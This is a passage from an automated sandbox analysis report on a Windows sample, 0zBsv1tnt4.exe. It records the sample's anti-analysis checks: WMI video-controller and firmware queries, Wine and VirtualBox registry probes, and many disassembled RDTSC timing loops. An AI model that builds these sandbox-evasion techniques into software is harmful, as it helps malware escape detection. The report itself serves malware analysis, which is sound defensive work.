Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B28E9D second address: B28EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC22D01ECC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B27F46 second address: B27F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282F2 second address: B282FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FA second address: B282FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FE second address: B28302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285B7 second address: B285BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285BB second address: B285C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285C9 second address: B285DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C445 second address: B2C4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 2F70E0A8h 0x0000000d and ch, FFFFFFC8h 0x00000010 mov edi, 2516EB77h 0x00000015 push 00000003h 0x00000017 call 00007FC22D01ECD1h 0x0000001c mov esi, dword ptr [ebp+122D3C3Eh] 0x00000022 pop ecx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FC22D01ECC8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f call 00007FC22D01ECD4h 0x00000044 mov ecx, 5B398ED9h 0x00000049 pop ecx 0x0000004a push 00000003h 0x0000004c jmp 00007FC22D01ECCAh 0x00000051 call 00007FC22D01ECC9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007FC22D01ECCCh 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4CF second address: B2C4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4D3 second address: B2C507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECCEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C507 second address: B2C514 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C514 second address: B2C53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FC22D01ECD7h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C72F second address: B2C736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C7EF second address: B2C7F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B3E30D second address: B3E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A383 second address: B4A387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A4FF second address: B4A509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A509 second address: B4A554 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FC22D01ECD8h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ecx 0x0000001e pushad 0x0000001f jmp 00007FC22D01ECD7h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A694 second address: B4A698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A698 second address: B4A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A69C second address: B4A6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007FC22CC1B8A6h 0x0000000d jmp 00007FC22CC1B8B0h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A6BA second address: B4A6E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECD7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC22D01ECCFh 0x0000000f js 00007FC22D01ECD2h 0x00000015 jnl 00007FC22D01ECC6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A949 second address: B4A969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC22CC1B8A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A969 second address: B4A96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC0A second address: B4AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC13 second address: B4AC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC17 second address: B4AC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B038 second address: B4B055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1BE second address: B4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jnp 00007FC22CC1B8BAh 0x0000000c jnp 00007FC22CC1B8ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1D2 second address: B4B1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BBBB second address: B4BBCF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22CC1B8AEh 0x00000008 jne 00007FC22CC1B8A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD3F second address: B4BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD43 second address: B4BD50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD50 second address: B4BD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b jmp 00007FC22D01ECD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BE93 second address: B4BEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e jno 00007FC22CC1B8A6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4C13A second address: B4C15D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 jg 00007FC22D01ECCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4F6C3 second address: B4F6E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FC22CC1B8A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnc 00007FC22CC1B8A6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC12 second address: B4FC3F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECCCh 0x00000008 jnc 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007FC22D01ECD2h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC3F second address: B4FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC45 second address: B4FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC4E second address: B4FC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECC8 second address: B4ECEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FC22D01ECC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECEC second address: B4ECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB5 second address: B4FDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB9 second address: B4FDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jns 00007FC22CC1B8A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDDF second address: B4FDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDEE second address: B4FE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FC22CC1B8ACh 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC22CC1B8B6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FE3B second address: B4FE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B511FD second address: B51204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B51204 second address: B5120A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57437 second address: B5743B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5743B second address: B57441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57441 second address: B57471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FC22CC1B8B2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B12D99 second address: B12D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C1C second address: B56C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007FC22CC1B8A6h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007FC22CC1B8A6h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C3C second address: B56C62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C62 second address: B56C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572E7 second address: B572EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572EB second address: B572F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572F9 second address: B572FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5949C second address: B594A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A2 second address: B594A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A6 second address: B594AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5964F second address: B59684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FC22D01ECD3h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC22D01ECC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C19 second address: B59C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C26 second address: B59C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CCD second address: B59CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CD3 second address: B59CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59E87 second address: B59E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A002 second address: B5A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A008 second address: B5A00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A11F second address: B5A125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A125 second address: B5A129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A129 second address: B5A14B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FC22D01ECD1h 0x00000014 jmp 00007FC22D01ECCBh 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1EF second address: B5A1FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1FD second address: B5A20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A20A second address: B5A229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c mov di, 4BD1h 0x00000010 xchg eax, ebx 0x00000011 jc 00007FC22CC1B8CBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FC22CC1B8A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A229 second address: B5A24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
